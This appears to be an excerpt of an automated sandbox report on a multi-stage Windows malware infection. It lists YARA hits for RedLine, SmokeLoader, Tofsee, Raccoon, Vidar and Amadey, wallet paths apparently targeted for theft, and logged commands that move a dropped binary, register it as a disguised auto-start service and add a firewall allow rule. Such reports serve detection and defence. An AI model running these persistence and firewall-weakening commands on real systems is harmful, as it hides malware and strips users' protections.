                          Source: 20.0.B3BA.exe.370000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 20.0.B3BA.exe.370000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 20.0.B3BA.exe.370000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 20.0.B3BA.exe.370000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 20.0.B3BA.exe.370000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 20.2.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 20.2.B3BA.exe.370000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 20.0.B3BA.exe.370000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 20.0.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 41.2.B3BA.exe.250000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 41.2.B3BA.exe.250000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 41.0.B3BA.exe.250000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 41.0.B3BA.exe.250000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 41.0.B3BA.exe.250000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 41.0.B3BA.exe.250000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 41.0.B3BA.exe.250000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 41.0.B3BA.exe.250000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 41.0.B3BA.exe.250000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 41.0.B3BA.exe.250000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeProcess created: C:\Users\user\Desktop\0Cjy7Lkv1A.exe "C:\Users\user\Desktop\0Cjy7Lkv1A.exe"
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaProcess created: C:\Users\user\AppData\Roaming\ujhcrda C:\Users\user\AppData\Roaming\ujhcrda
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6188 -ip 6188
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 520
                          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uuqefjyt\
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description uuqefjyt "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start uuqefjyt
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                          Source: explorer.exe, 00000005.00000000.412037085.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.375793677.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.392044166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.373865649.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397393127.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.403823845.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.383962963.00000000083E0000.00000004.00000001.sdmp, 60C2.exe, 0000000E.00000000.465437967.0000000000C60000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.468590395.0000000000C60000.00000002.00020000.sdmp, B3BA.exe, 0000002A.00000002.633666002.00000000017A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                          Source: explorer.exe, 00000005.00000000.373535922.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.392044166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.373865649.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.403473137.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.391702233.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.403823845.0000000000EE0000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.465437967.0000000000C60000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.468590395.0000000000C60000.00000002.00020000.sdmp, B3BA.exe, 0000002A.00000002.633666002.00000000017A0000.00000002.00020000.sdmpBinary or memory string: Progman
                          Source: explorer.exe, 00000005.00000000.392044166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.373865649.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.403823845.0000000000EE0000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.465437967.0000000000C60000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.468590395.0000000000C60000.00000002.00020000.sdmp, B3BA.exe, 0000002A.00000002.633666002.00000000017A0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                          Source: explorer.exe, 00000005.00000000.392044166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.373865649.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.403823845.0000000000EE0000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.465437967.0000000000C60000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.468590395.0000000000C60000.00000002.00020000.sdmp, B3BA.exe, 0000002A.00000002.633666002.00000000017A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: __EH_prolog,OpenJobObjectA,GetLocaleInfoA,_ftell,_fseek,_printf,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: __EH_prolog,CompareFileTime,EnumSystemLocalesW,GetConsoleAliasesA,FindResourceExW,GetVersionExA,VirtualQuery,CreateThread,SetComputerNameExA,_printf,_malloc,_calloc,__wfopen_s,_fseek,__floor_pentium4,_puts,GetConsoleAliasA,GetModuleHandleA,GlobalAlloc,GetConsoleTitleA,GetConsoleTitleA,GetConsoleTitleA,GetAtomNameW,CreateIoCompletionPort,GetFileAttributesW,GetDefaultCommConfigW,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeQueries volume information: C:\Users\user\AppData\Local\Temp\B3BA.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeQueries volume information: C:\Users\user\AppData\Local\Temp\B3BA.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_004092D7 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00401733 __EH_prolog,CompareFileTime,EnumSystemLocalesW,GetConsoleAliasesA,FindResourceExW,GetVersionExA,VirtualQuery,CreateThread,SetComputerNameExA,_printf,_malloc,_calloc,__wfopen_s,_fseek,__floor_pentium4,_puts,GetConsoleAliasA,GetModuleHandleA,GlobalAlloc,GetConsoleTitleA,GetConsoleTitleA,GetConsoleTitleA,GetAtomNameW,CreateIoCompletionPort,GetFileAttributesW,GetDefaultCommConfigW,

                          Lowering of HIPS / PFW / Operating System Security Settings:

                          barindex
                          Uses netsh to modify the Windows network and firewall settingsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Modifies the windows firewallShow sources
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

                          Stealing of Sensitive Information:

                          barindex
                          Yara detected RedLine StealerShow sources
                          Source: Yara matchFile source: 42.2.B3BA.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 42.0.B3BA.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 42.0.B3BA.exe.400000.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 42.0.B3BA.exe.400000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.2.B3BA.exe.399f910.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 42.0.B3BA.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 42.0.B3BA.exe.400000.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.2.B3BA.exe.3adba90.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.2.B3BA.exe.399f910.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.2.B3BA.exe.3adba90.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000014.00000002.565709295.0000000003881000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000000.537971963.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000002.629733104.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000000.539310965.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000000.538607329.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000002.566907931.00000000039F1000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000000.537161217.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected Amadeys stealer DLLShow sources
                          Source: Yara matchFile source: 0000002F.00000003.564856564.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000002.573157058.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000002.573324448.0000000000580000.00000040.00000001.sdmp, type: MEMORY
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 0.2.0Cjy7Lkv1A.exe.4615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.0Cjy7Lkv1A.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.1.ujhcrda.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.0Cjy7Lkv1A.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.ujhcrda.5315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.2.ujhcrda.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.0Cjy7Lkv1A.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.0Cjy7Lkv1A.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.0Cjy7Lkv1A.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.419458917.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.404651747.0000000004151000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.419524662.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.471381402.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.471483923.0000000000491000.00000004.00020000.sdmp, type: MEMORY
                          Yara detected Amadey botShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 0000002C.00000002.738735707.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000003.564687179.0000000004E70000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.629029283.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000011.00000002.474690379.0000000000571000.00000004.00000020.sdmp, type: MEMORY
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.svchost.exe.a50000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.670e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.A8FB.exe.550e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.eb0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.eb0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.3.szdcdkt.exe.690000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.svchost.exe.a50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.A8FB.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.A8FB.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.3.A8FB.exe.570000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000024.00000003.507342269.0000000000690000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.499421318.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.511069227.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.510317453.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000003.480122610.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.510779082.0000000000670000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.631897455.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.501018079.0000000000550000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: A8FB.exe PID: 4692, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: szdcdkt.exe PID: 2972, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6780, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmpString found in binary or memory: m-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmpString found in binary or memory: m8C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                          Source: B3BA.exeString found in binary or memory: set_UseMachineKeyStore
                          Source: Yara matchFile source: 00000011.00000002.474690379.0000000000571000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.748388079.0000000005114000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: B3BA.exe PID: 1756, type: MEMORYSTR

                          Remote Access Functionality:

                          barindex
                          Yara detected RedLine StealerShow sources
                          Source: Yara matchFile source: 42.2.B3BA.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 42.0.B3BA.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 42.0.B3BA.exe.400000.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 42.0.B3BA.exe.400000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.2.B3BA.exe.399f910.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 42.0.B3BA.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 42.0.B3BA.exe.400000.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.2.B3BA.exe.3adba90.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.2.B3BA.exe.399f910.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.2.B3BA.exe.3adba90.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000014.00000002.565709295.0000000003881000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000000.537971963.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000002.629733104.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000000.539310965.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000000.538607329.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000002.566907931.00000000039F1000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000000.537161217.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 0.2.0Cjy7Lkv1A.exe.4615a0.1.raw.unpack, type: UNPACKEDPE
